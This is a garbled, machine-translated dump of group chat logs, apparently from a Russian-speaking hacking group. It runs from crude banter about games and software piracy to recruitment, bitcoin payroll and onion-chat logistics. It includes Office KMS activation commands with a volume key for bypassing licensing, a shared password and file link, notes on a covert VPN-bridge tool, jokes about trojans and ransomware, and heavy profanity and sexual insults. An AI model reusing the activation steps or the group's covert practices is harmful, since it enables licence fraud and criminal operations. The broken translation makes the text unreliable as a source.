and now I've launched the fifth Metal Gear...anyway, it's old, well, not that, outside the 21 st century after the game like run around the field eating sheep, and here THAT I played stalker back in the first (if there were any more), in the years of selerons, well, THEN it was funky pohremno I shit really last fuck, I put here a month ago I wonder if the modern somehow catching?but also not a fan of the genreaazh scary it was i remember how on the first player i was impressed with the resident and vvlagovit about the black sea also turned out okay - Stalkerna need to check out but Metro was repeateda game is, excuse me, very differentekrut author, coolChitalnu i honestly with great pleasure read Pehov Sentinel, the theme is the same + - only prettier by virtue of the fact that the 10 years difference the game is exactly the same as it was Gothic 3 the search for hidden meanings where there is none, just a square) is like looking at a black square and did not come to mind until the Witcher not reached, but stupid as this, metal gore is like falling in love and see her in a porno..although no, it's not a comparison :D nu a man and a man, well the horse jumps, well the bots are stupid after the book can be anything, maybe I'm old just, but the witch, from which all come for some reason, not vtyrknikvot look like after the book to play in a game worthwhile, I played last gamehule was the game the same was not called? immediately it would be all clearNo like the metro! but Metro 2033 well that's fucking well I've readbooty not read Metro! what book? aaaaMetro 2033 kachaypizdetsya not in the subject in generalsereshenno you sereshenno?! the book is there?!? fuck! if the game is good, then we should think and downloadogo, also the book is there? 
i just thought about downloading play, but so, thought and zablnado was in Metro to play after the book, i would have finished just people like that epatastically flying into the chat room dick i can remember)) on the computer of course =) i would say something crossed between Kermit and me. about the subway, what played? units I would say I do not think that all, less than all know, and I do not understand who it is) well, I'm curious, what exactly the school old school a mystery, came from them and went into the sunset, tomorrow you ask is clear, but hoo from hoo?and more than once smells )nothing, it will happen again in the morning was a coven =) i must have missed something in life?) from Metro got a pleasurea what was it in the morning in this chat? no, now the games are really interesting and really in which you need to sweat your brains out. I here the current games I can not understand, there is nothing to playnu it's by itself and get into the eye of the raven from duhovushki 10 meters of me points on the stairs in the cagehuy know, I do not understand, I was only from the games of the sea I ahreya pay for everything BUT fuck, I have these games on my smartphone was over 40ne, nihera - I always buy something that I really like zazhit pentak for excellent software ... how i understand you (c) i'm looking at how much children's games cost.... it's fucked up. You download a game, well the price is 300P no big deal. And every add-on inside the game costs 150-200 and there are 30-40 of them and you have to pay for each one. Efeknuli content that the cloudvoprosy now is not in the cracks, now everything goes to the cloud and you need a connection with the servakranom was 10 here 383 already better maybe who cracks itksta, you can on androeed look there kashbek all sorts, as timeLuch better card tinkovakardera order, let them shipp5.33$:rofl:383.25 rubles/monthDamn, I do not have faith to give 10 bucks for thatStanislavsky photo...dear? 
on android?Man, here it was necessary to look there, but the program is good and expensive, they track the dogs podidi4ndujaba me strangled to buy one application with audiobooksumel you would do so applozhihi on buedorOf the cons, the winda take the license only if there is a connection with the server msVishne on the cake, if anyone needs, there is a utility for a digital license))) catch the cracker! Download the MediaCreationTool and run with the arguments ``` .\MediaCreationTool21H1.exe /Eula Accept /Retail /MediaArch x86 /MediaLangCode en-US /MediaEdition Enterprise ``` At the request of the key - enter the km key to download) Get the original windup in my head sawdust, yes yes yes, but for a link where to find the office itself from the mikes will be gratefulI downloaded 2019 Then this is what happens ``` retail to vl (I don't remember if this is for installation or after installation). dir ..\root\Licenses16\ProPlus2019VL*.xrm-ms cscript ospp.vbs /inslic:"..\root\Licenses16\ProPlus2019VL_KMS_Client_AE-ppd.xrm-ms" cscript ospp.vbs /inslic:"..\root\Licenses16\ProPlus2019VL_KMS_Client_AE-ul-oob.xrm-ms" cscript ospp.vbs /inslic:"...\root\Licenses16\ProPlus2019VL_KMS_Client_AE-ul.xrm-ms" ``` ``` cd c:\Program Files\Microsoft Office\Office15 cscript ospp.vbs /inpkey:NMMKJ-6RK4F-KMJVX-8D9MJ-6MWKP cscript ospp.vbs /sethst:192.168.000.001 cscript ospp.vbs /act ``` cspp server, sorts and exe I downloaded, run it on a virtual machine somewhere... (Here its ip for example 192.168.000.001) well, you opal, wait for me in the LN) I downloaded from them and converted the retail to vl, then activated the kmsomPrecise question) guys who pumped a clean office from the majors without vtroenie chips to breaking?!to the children of women on the ship, you know what, we have our own Christina potpchikkitAlf, we are the boys (mixed with flood:face_vomiting:expedient to make a second chat always looked at the General in the back, but now and even more so I will not. 
Spam all the timeButton : no : `Remove angelo the fuck out of the chat room` not there )@weldon , look at the top right next to the name of the chat room three vertical dots, there are Noification Preferences, maybe what you need run forest ))))))))))) goneon paranoid fuck in the pointsto his firewall there ))))))))))deal not offerthere the same fuck, just assume ))))))))0 and your Fridays are about a comrade's asshole. ask him if he wants it. ask him first. you know what the fuck. our Fridays are gonna be good. take care of your own assholes. that's all. wiping the drool off all the fuck))) i'm gonea then he'll exploit you and put his booty in you)) ahahahahahahaha your glasses when adjelo is around bdibuza take notea then the glasses of a fellow woman)))))))) well at least someone here mamkuin hutzker!and you're like - FUCK YOU OLD - i'm a mama's hutzker! can i turn off this "tapping"? my grandma came to me - "why are you tapping here..." she said the same thing! A better vagina is a comrade's asshole, no? i think i heard it more than once, but i can't say, i don't know about it, don't relax i'll be back again, i fucking left klava kokanu and you can't fuck with your klava kokanu until you fuck with yourself, i wish i had fucked you betterNo... fuck the code ) there's wankers here ) ahahahahahahaha coders fuckin' coders didn't even offer to fuck in the rmb what kind of a chat room is this))))))))) you've got to fuckin' have fun all right you have a working mood, don't be fucking bored)), it will be fun here in our country, you guys will be fucking boring and bland or just like in the olden days dekakov your software is boring and we'll check it out... there's no fucking silence... i can see that everyone is getting bored here... and fuck the americans... i'm bored... i don't know if you call it a chutzpah, but you're the only chutzpah... 
asshole weldon rename this chat room TNT Baba alone somehow, can I ask you a question, in Russian they don't usually translate terms, they say "to get hooked up", "to block", etc.? how will it be in programmer's asshole pussyfucking I still have a powder I'll fuck you and ask for a ransom! but I can not fuck with you when you're too cool with some words here and you decided to chat for a DODS :grin: and I'm here fucking think I fucking dreamed answer me bitch fucker must be fucking crazy to write me a fucking bentley?)))) a toad is fucking hovering And to pump up the chat room ) i'm fucking bored this morning at the office To see what the fuck is going on here i thought i'd come here so i'm the beautiful guys We got some fucking Italians too, who the fuck is this from the family archive? What a fucking avatar What the fuck's up with the screaming in the forest? Fucking great, Oleg!))))))))) you're the last motherfucker we need to hear about your life brother nikolai))) then we'll be fucking friends then) his belt - we're always talking bullshit, you'd better listen to me like your own brother, so listen to him ahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha, he's a fucking boozehound if he didn't have a software the reporter's news, he'd be a dick without oil, so listen to him, you can't fucking go camping without him, but he's fucking scary to me, he's always fucking one in a trillion, your fucking guy is hot))))))))))))) I won't tell him the truth? tell him, what do you do next? that's how the fuck he lived, he told me 010101010101 I told him 0101010 don't you know ))))muchy listen I'm not saying anything at all, your robot is a fuckin' robot Da0101010101010101010101 a booza you are loaded, it's a fano Yes! it's when americans' asses are on fire that's bullshit.
you think there's a code and you think it's fun to fuck with americans, you're all worked up, there's a link to a porno thrown in here. they're right, the guys say that once we remember our youth* in the cafe, we'll sit with you at night. he never forgets that there are people like you. i'll always be with you. )))))))))) do not come down, handsome)) he listens to music, he doesn't give a fuck about everything. i'm going crazy slowly as usual (the title credits show)))))))) a Quinnam clip. tell me all the time i got the YouTube captcha. what's up there???? and Suchkovs )-) Amer's nightmare https://www.youtube.com/watch?v=Od6hY_50Dh0 ``who the fuck am I))))))))))))))who the fuck am I? You hear me? I'm going to write the sequel to - All the Rising And so we transport it !exactly !for chesschert, I just thought of the scheme) and we carve horses from wood we help people move fasteramfetaminemdm? methadone? quaalude?methanol? glass is what and we are versatile individuals ! have we switched to drugs? 
we started with trojans))) no, we quietly cook glass, we're chemistry teachers now a little bit more details, we are not more than that Red !we're only fighting with horses before you get syphilis here)))))))))))) i'm going to ask you to fuckin' take down this chat room with the server all the time i went out a couple of times, i'd hit people with my pussy when it blew hard on my charms, i'm writing to the rm so you're putting them on, aren't you?)no, i just let the girls have the privilege of undressing angelo)))))))))))) they'll take off whoever they want, we'll send them early in the morning guys i haven't even taken my pants off yet why all the fuss!the world is not what I imagine it is to say who does what and shut the fuck up)) I love the medium for what my boobs posted herewel dan - medium прожарка░░░▄▄▄▓▀▀░░░░░░░▒▒▒▒▀▀▀▀▄░ ░░▐"░▄▀░░░░░░░░░░░░░▀▄░░"▌ ░░▐░▐░░░░░░░░░░░░░░░░░▐░░▌ ░░▐▐░░░░░░░▀▄▒▄▀░░░░░░░▐░░▌ ░░▐▐░░░░░░░▒▒▐▒▒░░░░░░░▐░░▌ ░░▐▐░░░▄░░░░▒▐▒░░░▄░░░░▐░░▌ ░░▐▐▒░░░░░▒▒▒▐▒▒▒░░░░░░▐░░▌░ ░░▐░▀▄▒▒▒▒▒▄▀▒▀▄▒▒▒▒▒▄▀▌░▌░ :grin:get to know the guys, I'm serious, I'm waiting for the whole fucking thing, at least someone will tell me what I'm doing... Hooray! The joyful spirit of Red is back! We missed you so much!!! ))))))))) booz:stuck_out_tongue_closed_eyes:in springfield where the fuck i gotbeardyhomerdickyfuckinggomer camebut quick fucking work))) cuhomer already turned on in the chat room sit what the fuck you all busy here)))))))) fucking i like SEX cars no big, redAnna, you like cars?i'm your cheese on my grillettes my grillettes i've been pining for yousilverinepriesthe morning of the collective farm ))))))))))))))))))))))))))))) all right)from the amazon forestsbecause you came to us from the forestthey nicknamed you sodickeypriesthee! wrote in pm )hi "dikii":D))beard, muscleswwwaaaahhhhhhhhhhhhh man manuallo manuel:Dooh, arigato!dibs you firstwritten )I have webcachom I can help you boysarigaatoa asalam malaykum you here? 
your profiles send me a better vkontakte ad let's create a whatsapp group what's the connection here? :softball: salaam malaykum) :mouse: .... I was told there are many serious men here angde all I miss why nobody has photos in their profiles whatsapp contacts exchange? 5?P8c}_p=xg%!6}jku Download: https://qaz.im/load/Ye2fFZ/6A7SbK Delete: https://qaz.im/index.php?a=delete&q=1735474595 and some methodology while I'll send you to read the terms of reference for the project, then I'll take you to the neighboring chat room, because all communication on the project is there. good, ok, I'm ready so-and-so). obligations such straight no, but you need to submit the work on time, to be adequate and be in touch. Workday from 9 to 18 Moscow, can be + - at start-finish. black transfer on a card or bitcoins (exchange it on your own). here we have all anonymous, the main direction of the company - software for pentesters. test job will be paid within a week (if not already paid), but most likely it's the next couple of days. now about the other. understood, dunno or not, but ready to try. than TCP / UDP / ICMP so the answer to your question - it works at the IP level at our end and the far end just gets the command to start vpn-tunneling. But the correct parameters for the configs of these tunnels, to connect the right clients to the right far ends (because there can be 100500 of them) - it's all a task of the bridge. The bridge is the coordinator of all the magic. on the bridge - its routing rules, and from our side is also climbing a VPN tunnel to the bridge. 3) that end. That's the end that we're hooked up to with the VPN. The agent works on it, lifting the VPN tunnel to the bridge. 2) bridge. On the bridge we have linux, and a bunch of iptables/scripts/local storage. 1) this is our end, the client end, and on it we take the most common one. our vpn system has three parts, the juice is in routing raw packets, regardless of Layer 3 protocols.
does it all work over udp? ping it open its balls in the network can not cling to the desktop of the remote machine at all, but to see its entire network as your local. if you look closely at TeamViewer, there is a very important and convenient thing called "vpn-tunnel". The idea - completely copied from the functionality of vpn in TeamViewer. this network vpn-bridge project, the point is the following: all you need to do - to understand it and pick up its support. The project is fully written but the developer got hungry and dropped out of the workflow. and it is similar to your software. now there is one very specific task. on linux - there are options to use libraries, but not on Windows, mostly raw options, as close as possible to WinAPI. we will not use boost asio, 100% without boost asio, sockets on WinAPI and threads work. while tipster asks - how do you work with networking / multithreading / understanding routing packets / iptables? i have no experience in commercial development. what is your favorite technology and what do you like/dislike about programming/work in general? What are your strengths? i've looked at the free format, too, it's laconic ) i've looked at the terms of reference, it's good. let's talk about it? hello @bones you can check it out now, try to logout, reset cache, change the node of the admin, then wait a minute. now? i can't wait a minute @bones can you see my messages? i wrote a message in my personal message there intermediary which was in a different city I'm here it's for me intermediary half an hour) hello Hello Hi mailing list, say hello to everyone online majors hark spuds Hello Hi all zanzi @gibby, send the admin a jabber. Those who sent earlier - duplicate it once again. @all @all Greetings. Email me your backup toads. As soon as possible. Hi Hi all! Send a wallet and the amount in BTC for salary in PM! mark Hi) thanks for writing) @all bros, for technical reasons salary is postponed to Monday.
Please do not fuss, on Monday it will all be ironclad, BTC is hung, and since the weekend is ahead - most likely it will be postponed to Monday. If anything comes before then I'll let you know right away. If it comes tomorrow, I'll be in touch all weekend! Don't panic! Hi all, can send a PM with wallet and the amount in BTC to pay 🙂 And your responsibilities (coder, admin of what project, etc. in short). Hi all! Guys, today / tomorrow payroll, so who recently started - send me in PM the date from which you work, external backup jabber and who your team lead is. Who is not on the list - will not get wages 🙂 Happy Monday all 🙂 docfox brick okzalische try to update tor. shas here came under your nick, meaning? should go to it, I sheschalis if I create a new identity, then from the chat it will throw me out? here sitting through tor. strange, you come through a tor-browser? aa in chats goes to https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/ no, this on what, on privatty? The connection was dropped says not to go to the second passport. top link to chat http://privatty.com/en/n/yrvZV2KcAf#yCmlga57I https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion link does not go to the same chat https://qaz.im/zaq/rD6ddf58#anSF7H8n https://qaz.im/zaq/74AQKb5R#RdfS6ZYs here you go, from the second chat. creds. hi bro hello Hey everyone, just a reminder. For direct communication in private chat (in private) at the beginning of the dialogue you need to turn on OTR (top right three dots -> OTR -> Start OTR). After the reconnect it is worth refreshing, refresh keys. It may not work smoothly at once, make sure that it worked) so are there no guys who joined this week - write me in pm! Hi, guys who have recently joined - write to me in PM, we will get acquainted. Well, send a purse in PM for wages and the amount in BTC. Gibby oxy skippy blade Well, guys who have recently joined - send me in PM the date from which you work, external backup jabber and who your team lead is, and your duties (coder, admin of what project, etc.
in brief) littleadmin_NengohMahCh8 hi all, good day taurus virgo aries when will someone be here? hello hello :grin: I will write as I start, waiting from adam the training was) :grin: while no one yet bro, except us. All newcomers need to send me in a personal message the following data: Nick, job duties in short, standby jabber (on any public server like jabber.ru, xmpp.jp or similar), the nickname of your teammate, the amount of salary we agreed on and the date of the last payment (if any). I will give you the salary. We have salary 2 times a month, the 1st and 15th of each month (+ - a couple of days). Peace to all locals :smile: silver frances adam it rugo hi, who has not been connected for long - write in PM.. Hello all! stout, hello. Hi @rugo hi rust toot Signed myself, thanks. Somehow before Biden had not thought to simply demand) terrible things happen ```REvil ransomware hackers linked to Russia suddenly disappeared from the darknet. Shortly before that, Biden demanded that Putin crack down on such groups``` Fellows who joined recently - send me the following data in private messages, it is necessary for the salary: Your backup jabber on a public server (exploit.im for example), Who is your teammate, date since which you work, and what is the salary agreement with teammate, and in fact your skills / duties. hai! Hi) Hey all @all the guys who joined recently - send me in a private message the following data, it is necessary for the salary: Your backup jabber on a public server (exploit.im for example), Who is your teammate, date since which you work, and what salary was agreed with teammate, and your actual skills and duties. It's hot today... but guys who joined recently - send me a private message with the following information, it's necessary for payroll: Your backup jabber on a public server (exploit.im for example), Who is your teammate, the date since which you work, and what is your salary agreement with teammate, and in fact your skills @all Hi!
Your backup jabber on a public server (exploit.im for example), Who is your teammate, date from which you work, and what salary was agreed with teammate. fuzz guys who joined recently - send me a personal message with the following data, it is necessary for wages. hello all! I now give more access to the other toad; if that one, my reserve toad is bormental@31337.life, if you suddenly don't have access here, knock on this toad in case the old server is no longer available and the new one is not yet available. all - exchange backup contacts with admin and stout. guys, the server is not yet wanted on v3, working on it. semya will sometimes appear. your senior is @stout, for all questions to him. semya since Mon on leave for 2 weeks. more announcement Hi Got it. @admin will make an announcement. Soon the site address will be changed. Hi @all I saw it too - tor browser updated this morning. They are already working on it, the address will be updated soon, I have it under control. Version 2 Onion Sites will be deprecated soon. This onion site will not be reachable soon. Please contact the site administrator and encourage them to upgrade. Tor is ending its support for version 2 onion services beginning in July 2021, and this onion site will no longer be reachable at this address. If you are the site administrator, upgrade to a version 3 onion service soon. hello hello hello!